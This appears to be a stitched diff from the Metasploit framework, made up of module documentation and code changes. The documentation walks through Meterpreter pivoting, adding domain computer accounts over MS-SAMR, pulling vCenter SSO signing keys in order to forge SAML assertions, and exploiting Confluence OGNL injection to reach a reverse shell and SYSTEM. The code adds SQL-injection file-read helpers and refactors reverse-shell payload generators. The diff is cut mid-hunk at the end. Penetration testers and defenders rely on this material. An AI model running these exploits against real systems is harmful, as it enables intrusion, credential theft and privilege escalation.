+[*] Writing 7168 bytes to revpipe_meterpreter_msfpipe.exe...
+```
+
+After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
+```
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500
+
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                Connection
+  --  ----  ----                     -----------                                ----------
+  1         meterpreter x64/windows  WIN11\msfuser @ WIN11          172.19.182.171:4578 -> 172.19.185.34:49674 (172.19.185.34)
+  2         meterpreter x64/windows  WIN2019\msfuser @ WIN2019      Pivot via [172.19.182.171:4578 -> 172.19.185.34:49674]
+                                                                                 (169.254.204.110)
+
+```
+## Pivoting External Tools
+
+### portfwd
 *Note: This method is discouraged as you can only set up a mapping between a single port and another target host and port, so using the socks module below is encouraged where possible. Additionally this method has been depreciated for some time now.*

-### Local Port Forwarding
+#### Local Port Forwarding
 To set up a port forward using Metasploit, use the `portfwd` command within a supported session's console such as the Meterpreter console. Using `portfwd -h` will bring up a help menu similar to the following:

 ```
@@ -262,7 +335,7 @@ Connecting to 127.0.0.1:443... failed: Connection refused.

 Note that you may need to edit your `/etc/hosts` file to map IP addresses to given host names to allow things like redirects to redirect to the right hostname or IP address when using this method of pivoting.

-### Listing Port Forwards and Removing Entries
+#### Listing Port Forwards and Removing Entries
 Can list port forwards using the `portfwd list` command. To delete all port forwards use `portfwd flush`. Alternatively to selectively delete local port forwarding entries, use `portfwd delete -l <local port>`.

 ```
@@ -275,7 +348,7 @@ No port forwards are currently active.
 meterpreter >
 ```

-### Remote Port Forwarding
+#### Remote Port Forwarding
 This scenario is a bit different than above. Whereas previously we were instructing the session to forward traffic from our host running Metasploit, through the session, and to a second target host, with reverse port forwarding the scenario is a bit different. In this case we are instructing the session to forward traffic from other hosts through the session, and to our host running Metasploit. This is useful for allowing other applications running within a target network to interact with local applications on the machine running Metasploit.

 To set up a reverse port forward, use `portfwd add -R` within a supported session and then specify the `-l`, `-L` and `-p` options. The `-l` option specifies the port to forward the traffic to, the `-L` option specifies the IP address to forward the traffic to, and the `-p` option specifies the port to listen on for traffic on the machine that we have a session on (whose session console we are currently interacting with).
@@ -0,0 +1,100 @@
+## Vulnerable Application
+Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
+computers to the domain. Administrative privileges however are required to delete the created accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### COMPUTER_NAME
+
+The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
+
+### COMPUTER_PASSWORD
+
+The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
+will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
+used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
+will be used.
+
+### DELETE_COMPUTER
+
+Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
+
+### LOOKUP_COMPUTER
+
+Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
+(SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS             192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass            Password1        no        The password for the specified username
+   SMBUser            aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password      
+
+msf6 auxiliary(admin/dcerpc/samr_computer) >
+```
@@ -0,0 +1,98 @@
+Grab certificates from the vCenter server vmdird or vmafd database files and adds them to loot.
+This module will accept files from a live vCenter appliance or from a vCenter appliance backup
+archive; either or both files can be supplied to the module depending on the situation. The module
+will extract the vCenter SSO IdP signing credential from the vmdir database, which can be used to
+create forged SAML assertions and access the SSO directory as an administrator. The vmafd service
+contains the vCenter certificate store which from which the module will attempt to extract all vmafd
+certificates that also have a corresponding private key. Portions of this module are based on
+information published by Zach Hanley at Horizon3:
+
+https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/
+
+## Vulnerable Application
+This module is tested against the vCenter appliance but will probably work against Windows instances.
+It has been tested against files from vCenter appliance versions 6.5, 6.7, and 7.0. The module will
+work with files retrieved from a live vCenter system as well as files extracted from an unencrypted
+vCenter backup archive.
+
+## Verification Steps
+You must possess the vmdir and/or vmafd database files from vCenter in order to use this module. The
+files must be local to the system invoking the module. Where possible, you should provide the
+`VC_IP` option to tag relevant loot entries with the IPv4 address of the originating system. If no
+value is provided for `VC_IP` the module defaults to assigning the loopback IP `127.0.0.1`.
+
+1. Acquire the vmdir and/or vmafd database files from vCenter (see below)
+2. Start msfconsole
+3. Do: `use auxiliary/admin/vmware/vcenter_offline_mdb_extract`
+4. Do: `set vmdir_mdb <path to data.mdb>` if you are extracting from the vmdir database
+5. Do: `set vmafd_db <path to afd.db>` if you are extracting from the vmafd database
+6. Do: `set vc_ip <vCenter IPv4>` to attach the target vCenter IPv4 address to loot entries
+7. Do: `dump`
+
+## Options
+**VMDIR_MDB**
+
+Path to the vmdird MDB database file on the local system. Example: `/tmp/data.mdb`
+
+**VMAFD_DB**
+
+Path to the vmafd DB file on the local system. Example: `/tmp/afd.db`
+
+**VC_IP**
+
+Optional parameter to set the IPv4 address associated with loot entries made by the module.
+
+## Scenarios
+
+### Acquire Database Files
+This module targets the internal databases of vCenter vmdir (OpenLDAP Memory-Mapped Database) and
+vmafd (SQLite3). On a live vCenter appliance, these files can be downloaded with root access from
+the following locations:
+
+`vmdir: /storage/db/vmware-vmdir/data.mdb`
+`vmafd: /storage/db/vmware-vmafd/afd.db`
+    
+If you are extracting from a backup file, target files are available in the following archives:
+
+`vmdir: lotus_backup.tar.gz`
+`vmafd: config_files.tar.gz`
+
+### Running the Module
+Example run against database files extracted from vCenter appliance version 7.0 Update 3d:
+
+```
+msf6 > use auxiliary/admin/vmware/vcenter_offline_mdb_extract
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vmdir_mdb /tmp/data.mdb
+vmdir_mdb => /tmp/data.mdb
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vmafd_db /tmp/afd.db
+vmafd_db => /tmp/afd.db
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vc_ip 192.168.100.70
+vc_ip => 192.168.100.70
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > dump
+
+[*] Extracting vmwSTSTenantCredential from /tmp/data.mdb ...
+[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_idp_571080.key
+[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_idp_564729.pem
+[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_vmca_721819.pem
+[*] Extracting vSphere platform certificates from /tmp/afd.db ...
+[+] __MACHINE_CERT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70___MACHINE_CERT_869237.key
+[+] __MACHINE_CERT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70___MACHINE_CERT_240839.pem
+[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_DATAENCIPHERMEN_350586.key
+[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_DATAENCIPHERMEN_106169.pem
+[+] HVC key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_HVC_825963.key
+[+] HVC cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_HVC_399928.pem
+[+] MACHINE key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_MACHINE_995574.key
+[+] MACHINE cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_MACHINE_156797.pem
+[+] SMS_SELF_SIGNED key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_SMS_SELF_SIGNED_169524.key
+[+] SMS_SELF_SIGNED cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_SMS_SELF_SIGNED_230704.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXD_370336.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXD_300599.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXDEXTENSION_571196.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXDEXTENSION_088742.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VSPHEREWEBCLIEN_060718.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VSPHEREWEBCLIEN_280013.pem
+[+] WCP key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_WCP_057402.key
+[+] WCP cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_WCP_909204.pem
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > 
+```
@@ -87,4 +87,41 @@ Meterpreter     : python/linux
 meterpreter > 
 ```

+### Confluence 7.17.2 on Windows Server 2019
+
+```
+msf6 > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set TARGET Windows\ Command 
+TARGET => Windows Command
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully tested OGNL injection.
+[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
+[*] Sending stage (200774 bytes) to 192.168.159.10
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49943) at 2022-06-15 17:22:07 -0400
+
+meterpreter > sysinfo
+Computer        : WIN-3MSP8K2LCGC
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > getsystem
+...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
+meterpreter > 
+```
+
 [1]: https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro
@@ -18,6 +18,17 @@ exploitation can take a few minutes.
  6.  Verify the module yields a PHP meterpreter session in < 5 minutes
  7.  Verify the malicious PHP file was automatically removed

+## Options
+
+### WAIT_TIMEOUT
+Seconds to wait to trigger the payload
+### NameField
+Name of the element for the Name field
+### EmailField
+Name of the element for the Email field
+### MessageField
+Name of the element for the Message field
+
 ## Scenarios

  Demo taken directly from [PR7768](https://github.com/rapid7/metasploit-framework/pull/7768)
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "6.2.2"
+      VERSION = "6.2.5"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -196,6 +196,24 @@ module Msf::Exploit::SQLi::Mssqli
      run_sql("select '#{data}' into dumpfile '#{fpath}'")
    end

+    #
+    # Attempt reading from a file on the filesystem
+    # @param fpath [String] The path of the file to read
+    # @return [String] The content of the file if reading was successful
+    #
+    def read_from_file(fpath, binary=false)
+      alias1 = Rex::Text.rand_text_alpha(1) + Rex::Text.rand_text_alphanumeric(5..11)
+      expr = @encoder ? @encoder[:encode].sub(/\^DATA\^/, 'BulkColumn') : 'BulkColumn'
+      output = if @truncation_length
+        truncated_query("select substring(#{expr},^OFFSET^,#{@truncation_length}) " \
+        "from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
+      else
+        run_sql("select #{expr} from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
+      end
+      output = @encoder[:decode].call(output) if @encoder
+      output
+    end
+
    private

    #
@@ -13,7 +13,7 @@ module Msf::Exploit::SQLi::MySQLi
    #
    ENCODERS = {
      base64: {
-        encode: 'to_base64(^DATA^)',
+        encode: 'replace(to_base64(^DATA^), \'\\n\', \'\')',
        decode: proc { |data| Base64.decode64(data) }
      },
      hex: {
@@ -217,10 +217,11 @@ module Msf::Exploit::SQLi::MySQLi
    #
    # Attempt reading from a file on the filesystem, requires having the FILE privilege
    # @param fpath [String] The path of the file to read
+    # @param binary [Boolean] Whether the target file is a binary one or not
    # @return [String] The content of the file if reading was successful
    #
-    def read_from_file(fpath)
-      run_sql("select load_file('#{fpath}')")
+    def read_from_file(fpath, binary=false)
+      call_function("load_file('#{fpath}')")
    end

    private
@@ -13,7 +13,7 @@ module Msf::Exploit::SQLi::PostgreSQLi
    #
    ENCODERS = {
      base64: {
-        encode: 'encode(^DATA^::bytea, \'base64\')',
+        encode: 'translate(encode(^DATA^::bytea, \'base64\'), E\'\n\',\'\')',
        decode: proc { |data| Base64.decode64(data) }
      },
      hex: {
@@ -206,6 +206,22 @@ module Msf::Exploit::SQLi::PostgreSQLi
      raw_run_sql("copy (select '#{data}') to '#{fname}'")
    end

+    #
+    # Attempt reading from a file on the filesystem
+    # @param fpath [String] The path of the file to read
+    # @param binary [String] Whether the target file should be considered a binary one (defaults to false)
+    # @return [String] The content of the file if reading was successful
+    #
+    def read_from_file(fpath, binary=false)
+      if binary
+        # pg_read_binary_file returns bytea
+        # an encoder might be needed
+        call_function("pg_read_binary_file('#{fpath}')")
+      else
+        call_function("pg_read_file('#{fpath}')")
+      end
+    end
+
    private

    #
@@ -59,10 +59,10 @@ class Payload < Msf::Module
    #
    self.module_info['Dependencies'] = self.module_info['Dependencies'] || []

-    # If this is a staged payload but there is no stage information,
+    # If this is an adapted or staged payload but there is no stage information,
    # then this is actually a stager + single combination.  Set up the
    # information hash accordingly.
-    if self.class.include?(Msf::Payload::Single) and
+    if (self.class.include?(Msf::Payload::Adapter) || self.class.include?(Msf::Payload::Single)) and
      self.class.include?(Msf::Payload::Stager)
      self.module_info['Stage'] = {}

@@ -288,7 +288,7 @@ class Payload < Msf::Module
  #
  # Generates the payload and returns the raw buffer to the caller.
  #
-  def generate
+  def generate(_opts = {})
    internal_generate
  end

@@ -43,7 +43,7 @@ module Payload::Generic
  # the actual payload in case settings have changed.  Other methods will
  # use the cached version if possible.
  #
-  def generate
+  def generate(_opts = {})
    reset

    redirect_to_actual(:generate)
@@ -19,7 +19,7 @@ module Payload::Linux::BindTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:     datastore['LPORT'],
      reliable: false
@@ -18,7 +18,7 @@ module Payload::Linux::ReverseTcp_x86
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:          datastore['LPORT'],
      host:          datastore['LHOST'],
@@ -17,7 +17,7 @@ module Payload::Linux::ReverseTcp_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -17,7 +17,7 @@ module Payload::Php::BindTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port: datastore['LPORT']
    }
@@ -17,7 +17,7 @@ module Payload::Php::ReverseTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -16,7 +16,7 @@ module Payload::Python::BindTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port: datastore['LPORT']
    }
@@ -21,7 +21,7 @@ module Payload::Python::ReverseTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -20,7 +20,7 @@ module Payload::Python::ReverseTcpSsl
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -23,7 +23,7 @@ module Msf::Payload::Single
  # return the stager.  When a stager is not used, generate will return the
  # single payload
  #
-  def generate
+  def generate(_opts = {})
    # If we're staged, then we call the super to generate the STAGER
    if staged?
      super
@@ -30,7 +30,7 @@ module Payload::Windows::BindNamedPipe
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      name:        datastore['PIPENAME'],
      host:        datastore['PIPEHOST'],
@@ -21,7 +21,7 @@ module Payload::Windows::BindTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:     datastore['LPORT'],
      reliable: false
@@ -17,7 +17,7 @@ module Payload::Windows::BindTcpRc4
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port:     datastore['LPORT'],
@@ -61,9 +61,9 @@ module Payload::Windows::EncryptedReverseTcp

    src = ''
    if staged?
-      src = generate_stager(conf)
+      src = generate_stager(conf, opts)
    else
-      src = generate_c_src(conf)
+      src = generate_c_src(conf, opts)
    end

    link_script = module_info['DefaultOptions']['LinkerScript']
@@ -76,7 +76,7 @@ module Payload::Windows::EncryptedReverseTcp
      keep_exe:      datastore['KeepExe'],
      show_compile_cmd: datastore['ShowCompileCMD'],
      f_name:        Tempfile.new(staged? ? 'reverse_pic_stager' : 'reverse_pic_stageless').path,
-      arch:          self.arch_to_s
+      arch:          opts.fetch(:arch, self.arch_to_s)
    }

    comp_code = get_compiled_shellcode(src, compile_opts)
@@ -92,9 +92,9 @@ module Payload::Windows::EncryptedReverseTcp
    comp_code
  end

-  def initial_code
+  def initial_code(conf, opts = {})
    src = headers
-    src << align_rsp if self.arch_to_s.eql?('x64')
+    src << align_rsp if opts.fetch(:arch, self.arch_to_s).eql?('x64')

    if staged?
      src << chacha_func_staged
@@ -104,8 +104,8 @@ module Payload::Windows::EncryptedReverseTcp
    src << exit_proc
  end

-  def generate_stager(conf)
-    src = initial_code
+  def generate_stager(conf, opts = {})
+    src = initial_code(conf, opts)

    if conf[:call_wsastartup]
      src << init_winsock
@@ -115,7 +115,7 @@ module Payload::Windows::EncryptedReverseTcp
    src << get_load_library(conf[:host], conf[:port])
    src << call_init_winsock if conf[:call_wsastartup]
    src << start_comm(conf[:uuid])
-    src << stager_comm
+    src << stager_comm(conf, opts)
  end

  def sends_hex_uuid?
@@ -148,21 +148,21 @@ module Payload::Windows::EncryptedReverseTcp
      keep_exe:      datastore['KeepExe'],
      show_compile_cmd: datastore['ShowCompileCMD'],
      f_name:        Tempfile.new('reverse_pic_stage').path,
-      arch:          self.arch_to_s
+      arch:          opts.fetch(:arch, self.arch_to_s)
    }

-    src = initial_code
+    src = initial_code(conf, opts)
    src << get_new_key
    src << init_proc
-    src << exec_payload_stage
+    src << exec_payload_stage(conf, opts)
    shellcode = get_compiled_shellcode(src, comp_opts)

    stage_obj = Rex::Crypto::Chacha20.new(key, iv)
    stage_obj.chacha20_crypt(shellcode)
  end

-  def generate_c_src(conf)
-    src = initial_code
+  def generate_c_src(conf, opts = {})
+    src = initial_code(conf, opts)

    if conf[:call_wsastartup]
      src << init_winsock
@@ -552,9 +552,10 @@ module Payload::Windows::EncryptedReverseTcp
    ^
  end

-  def stager_comm
-    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
-    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+  def stager_comm(conf, opts = {})
+    arch = opts.fetch(:arch, self.arch_to_s)
+    reg = arch.eql?('x86') ? 'edi' : 'rdi'
+    inst = arch.eql?('x86') ? 'movl' : 'movq'

    %Q^
        FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')}); // hash('ws2_32.dll', 'recv') -> 0x5fc8d902
@@ -596,9 +597,10 @@ module Payload::Windows::EncryptedReverseTcp
    ^
  end

-  def exec_payload_stage
-    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
-    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+  def exec_payload_stage(conf, opts = {})
+    arch = opts.fetch(:arch, self.arch_to_s)
+    reg = arch.eql?('x86') ? 'edi' : 'rdi'
+    inst = arch.eql?('x86') ? 'movl' : 'movq'

    %Q^
     void ExecutePayload()
@@ -57,7 +57,7 @@ module Payload::Windows::Exec
  #
  # Constructs the payload
  #
-  def generate
+  def generate(_opts = {})
    return super + command_string + "\x00"
  end

@@ -53,7 +53,7 @@ module Payload::Windows::Exec_x64
      ], self.class )
  end

-  def generate
+  def generate(_opts = {})
    return super + command_string + "\x00"
  end

@@ -57,7 +57,7 @@ module Payload::Windows::LoadLibrary
  #
  # Constructs the payload
  #
-  def generate
+  def generate(_opts = {})
    return super + dll_string + "\x00"
  end

@@ -67,8 +67,9 @@ module Msf
  module Payload::Windows::PEInject
    def initialize(info = {})
      super
+
      register_options([
-        OptInjectablePE.new('PE', [ true, 'The local path to the PE file to upload' ], arch: arch.first)
+        OptInjectablePE.new('PE', [ true, 'The local path to the PE file to upload' ], arch: info.fetch('AdaptedArch', arch.first))
      ], self.class)
    end

@@ -83,7 +84,7 @@ module Msf
    # Transmits the reflective PE payload to the remote
    # computer so that it can be loaded into memory.
    #
-    def handle_connection(conn, _opts = {})
+    def handle_connection(conn, opts = {})
      data = ''
      begin
        File.open(pe_path, 'rb') do |f|
@@ -96,7 +97,7 @@ module Msf
      end

      print_status('Premapping PE file...')
-      pe_map = create_pe_memory_map(data)
+      pe_map = create_pe_memory_map(data, opts)
      print_status("Mapped PE size #{pe_map[:bytes].length}")
      opts = {}
      opts[:is_dll] = pe_map[:is_dll]
@@ -113,10 +114,10 @@ module Msf
      conn.close
    end

-    def create_pe_memory_map(file)
+    def create_pe_memory_map(file, opts = {})
      pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(file))
      begin
-        OptInjectablePE.assert_compatible(pe, arch.first)
+        OptInjectablePE.assert_compatible(pe, opts.fetch(:arch, arch.first))
      rescue Msf::ValidationError => e
        print_error("PE validation error: #{e.message}")
        raise
@@ -26,7 +26,7 @@ module Payload::Windows::ReverseNamedPipe
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      name:        datastore['PIPENAME'],
      host:        datastore['PIPEHOST'] || '.',
@@ -25,7 +25,7 @@ module Payload::Windows::ReverseTcpDns
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -17,7 +17,7 @@ module Payload::Windows::ReverseTcpRc4
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port:        datastore['LPORT'],
@@ -17,7 +17,7 @@ module Payload::Windows::ReverseTcpRc4Dns
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port:        datastore['LPORT'],
@@ -16,7 +16,7 @@ module Payload::Windows::ReverseUdp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -29,7 +29,7 @@ module Payload::Windows::ReverseWinHttps
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})

    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                         datastore['HandlerSSLCert'])
@@ -30,7 +30,7 @@ module Payload::Windows::BindNamedPipe_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      name:        datastore['PIPENAME'],
      host:        datastore['PIPEHOST'],
@@ -16,7 +16,7 @@ module Payload::Windows::BindTcpRc4_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port:        datastore['LPORT'],
@@ -19,7 +19,7 @@ module Payload::Windows::BindTcp_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:     datastore['LPORT'],
      reliable: false
@@ -25,7 +25,7 @@ module Payload::Windows::ReverseNamedPipe_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      name:        datastore['PIPENAME'],
      host:        datastore['PIPEHOST'],
@@ -16,7 +16,7 @@ module Payload::Windows::ReverseTcpRc4_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port:        datastore['LPORT'],
@@ -26,7 +26,7 @@ module Payload::Windows::ReverseTcp_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -28,7 +28,7 @@ module Payload::Windows::ReverseWinHttps_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})

    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                         datastore['HandlerSSLCert'])
@@ -294,6 +294,7 @@ module Services
  # Mode is a string with either auto, manual or disable for the
  # corresponding setting. The name of the service is case sensitive.
  #
+  # @raise [RuntimeError] if an invalid startup mode is provided in the mode parameter
  #
  def service_change_startup(name, mode, server=nil)
    if mode.is_a? Integer
@@ -338,6 +339,8 @@ module Services
  #
  # @return [GetLastError] 0 if the function succeeds
  #
+  # @raise [RuntimeError] if OpenSCManagerA failed
+  #
  def service_change_config(name, opts, server=nil)
    open_sc_manager(:host=>server, :access=>"SC_MANAGER_CONNECT") do |manager|
      open_service_handle(manager, name, "SERVICE_CHANGE_CONFIG") do |service_handle|
@@ -369,6 +372,8 @@ module Services
  #
  # @return [GetLastError] 0 if the function succeeds
  #
+  # @raise [RuntimeError] if OpenSCManagerA failed
+  #
  def service_create(name, opts, server=nil)
    access = "SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE | SC_MANAGER_QUERY_LOCK_STATUS"
    open_sc_manager(:host=>server, :access=>access) do |manager|
@@ -465,6 +470,8 @@ module Services
  #
  # @param (see #service_start)
  #
+  # @raise [RuntimeError] if OpenServiceA failed
+  #
  def service_delete(name, server=nil)
    open_sc_manager(:host=>server) do |manager|
      open_service_handle(manager, name, "DELETE") do |service_handle|
@@ -483,7 +490,6 @@ module Services
  #
  # @raise (see #service_start)
  #
-  #
  def service_status(name, server=nil)
    ret = nil

@@ -513,53 +519,41 @@ module Services
  #
  # @return [Boolean] indicating success
  #
-  #
-  def service_restart(name, start_type=START_TYPE_AUTO, server=nil)
-    tried = false
+  def service_restart(name, start_type=START_TYPE_AUTO, server=nil, should_retry=true)
+    status = service_start(name, server)

-    begin
